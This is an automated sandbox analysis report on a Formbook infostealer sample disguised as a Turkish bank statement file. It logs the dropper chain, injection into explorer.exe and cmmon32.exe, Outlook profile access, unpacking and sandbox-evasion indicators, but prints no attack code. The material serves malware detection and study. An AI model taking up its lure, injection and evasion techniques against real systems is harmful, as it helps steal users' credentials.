          Source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_0040C24A1_2_0040C24A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_0040B61D1_2_0040B61D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_0040B0CC1_2_0040B0CC
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_0040BB6E1_2_0040BB6E
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_0040D7001_2_0040D700
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004058032_2_00405803
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004038832_2_00403883
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00401B602_2_00401B60
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00421B3F2_2_00421B3F
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00401C702_2_00401C70
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004055E22_2_004055E2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004055E32_2_004055E3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004206D32_2_004206D3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004017C02_2_004017C0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0040BFCE2_2_0040BFCE
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0040BFD32_2_0040BFD3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0040BF8D2_2_0040BF8D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004017B32_2_004017B3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB20A02_2_00AB20A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B520A82_2_00B520A8
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9B0902_2_00A9B090
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B410022_2_00B41002
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA41202_2_00AA4120
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8F9002_2_00A8F900
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B522AE2_2_00B522AE
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABEBB02_2_00ABEBB0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B52B282_2_00B52B28
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9841F2_2_00A9841F
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB25812_2_00AB2581
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9D5E02_2_00A9D5E0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A80D202_2_00A80D20
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B52D072_2_00B52D07
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B51D552_2_00B51D55
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B52EF72_2_00B52EF7
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA6E302_2_00AA6E30
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B51FF12_2_00B51FF1
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: String function: 00A8B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041E5F3 NtCreateFile,2_2_0041E5F3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041E6A3 NtReadFile,2_2_0041E6A3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041E723 NtClose,2_2_0041E723
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041E7D3 NtAllocateVirtualMemory,2_2_0041E7D3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041E5ED NtCreateFile,2_2_0041E5ED
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041E69D NtReadFile,2_2_0041E69D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041E7CD NtAllocateVirtualMemory,2_2_0041E7CD
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00AC98F0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00AC9860
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9840 NtDelayExecution,LdrInitializeThunk,2_2_00AC9840
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC99A0 NtCreateSection,LdrInitializeThunk,2_2_00AC99A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00AC9910
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9A20 NtResumeThread,LdrInitializeThunk,2_2_00AC9A20
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00AC9A00
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9A50 NtCreateFile,LdrInitializeThunk,2_2_00AC9A50
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC95D0 NtClose,LdrInitializeThunk,2_2_00AC95D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9540 NtReadFile,LdrInitializeThunk,2_2_00AC9540
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00AC96E0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00AC9660
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00AC97A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9780 NtMapViewOfSection,LdrInitializeThunk,2_2_00AC9780
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9FE0 NtCreateMutant,LdrInitializeThunk,2_2_00AC9FE0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9710 NtQueryInformationToken,LdrInitializeThunk,2_2_00AC9710
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC98A0 NtWriteVirtualMemory,2_2_00AC98A0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9820 NtEnumerateKey,2_2_00AC9820
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ACB040 NtSuspendThread,2_2_00ACB040
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC99D0 NtCreateProcessEx,2_2_00AC99D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9950 NtQueueApcThread,2_2_00AC9950
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9A80 NtOpenDirectoryObject,2_2_00AC9A80
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9A10 NtQuerySection,2_2_00AC9A10
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ACA3B0 NtGetContextThread,2_2_00ACA3B0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9B00 NtSetValueKey,2_2_00AC9B00
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC95F0 NtQueryInformationFile,2_2_00AC95F0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9520 NtWaitForSingleObject,2_2_00AC9520
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ACAD30 NtSetContextThread,2_2_00ACAD30
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9560 NtWriteFile,2_2_00AC9560
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC96D0 NtCreateKey,2_2_00AC96D0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9610 NtEnumerateValueKey,2_2_00AC9610
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9670 NtQueryInformationProcess,2_2_00AC9670
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9650 NtQueryValueKey,2_2_00AC9650
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9730 NtQueryVirtualMemory,2_2_00AC9730
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ACA710 NtOpenProcessToken,2_2_00ACA710
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9760 NtOpenProcess,2_2_00AC9760
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC9770 NtSetInformationFile,2_2_00AC9770
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ACA770 NtOpenThread,2_2_00ACA770
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 30%
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 43%
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeJump to behavior
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\tqxwmam.exe "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeProcess created: C:\Users\user\AppData\Local\Temp\tqxwmam.exe C:\Users\user\AppData\Local\Temp\tqxwmam.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\tqxwmam.exe "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.djJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeProcess created: C:\Users\user\AppData\Local\Temp\tqxwmam.exe C:\Users\user\AppData\Local\Temp\tqxwmam.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsvBFE7.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/5@8/6
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_00401000 GetLastError,LoadStringW,FormatMessageW,MessageBoxW,LocalFree,1_2_00401000
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCommand line argument: @1_2_00401EEB
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\xampp\htdocs\f0fce35ed4774783839e8c65445068bf\Loader\Release\Loader.pdb source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe, 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmp, T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe, 00000000.00000002.306790844.0000000002845000.00000004.00000020.00020000.00000000.sdmp, tqxwmam.exe, 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmp, tqxwmam.exe, 00000001.00000000.292893107.000000000040E000.00000002.00000001.01000000.00000004.sdmp, tqxwmam.exe, 00000002.00000000.295754876.000000000040E000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000002.570167249.00000000151E3000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557026801.0000000000974000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.0000000004E43000.00000004.10000000.00040000.00000000.sdmp, tqxwmam.exe.0.dr, nsvBFE8.tmp.0.dr
          Source: Binary string: wntdll.pdbUGP source: tqxwmam.exe, 00000001.00000003.297446466.000000001A130000.00000004.00001000.00020000.00000000.sdmp, tqxwmam.exe, 00000001.00000003.296475865.0000000002200000.00000004.00001000.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000002.331478562.0000000000B7F000.00000040.00001000.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000003.302557401.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.332912365.0000000004964000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.331123365.00000000047C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557966752.0000000004B00000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557966752.0000000004C1F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: tqxwmam.exe, tqxwmam.exe, 00000002.00000002.331478562.0000000000B7F000.00000040.00001000.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000003.302557401.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.332912365.0000000004964000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.331123365.00000000047C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557966752.0000000004B00000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557966752.0000000004C1F000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeUnpacked PE file: 2.2.tqxwmam.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_004052D5 push ecx; ret 1_2_004052E8
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00407033 push ds; retf 2_2_00407034
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041B377 pushad ; iretd 2_2_0041B378
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0041B379 push eax; iretd 2_2_0041B37A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00403444 push ebp; ret 2_2_00403450
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004055DA push ecx; ret 2_2_004055E1
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_004105E3 push esi; iretd 2_2_004105ED
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00401DB0 push eax; ret 2_2_00401DB2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ADD0D1 push ecx; ret 2_2_00ADD0E4
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_004039C5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_004039C5
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\tqxwmam.exeJump to dropped file
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Contains functionality to detect sleep reduction / modifications
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_00401EEB1_2_00401EEB
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5688Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB6A60 rdtscp 2_2_00AB6A60
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 862Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeAPI coverage: 9.6 %
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeAPI coverage: 9.6 %
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_00401EEB1_2_00401EEB
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000002.564160955.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.306023557.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.313383249.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.313383249.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.307756881.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cmmon32.exe, 00000004.00000002.557026801.0000000000993000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557026801.0000000000A51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.313383249.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536972798.000000000EFDB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk4&
          Source: cmmon32.exe, 00000004.00000002.557026801.0000000000A51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhtWeight Filter-0000
          Source: explorer.exe, 00000003.00000002.564160955.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
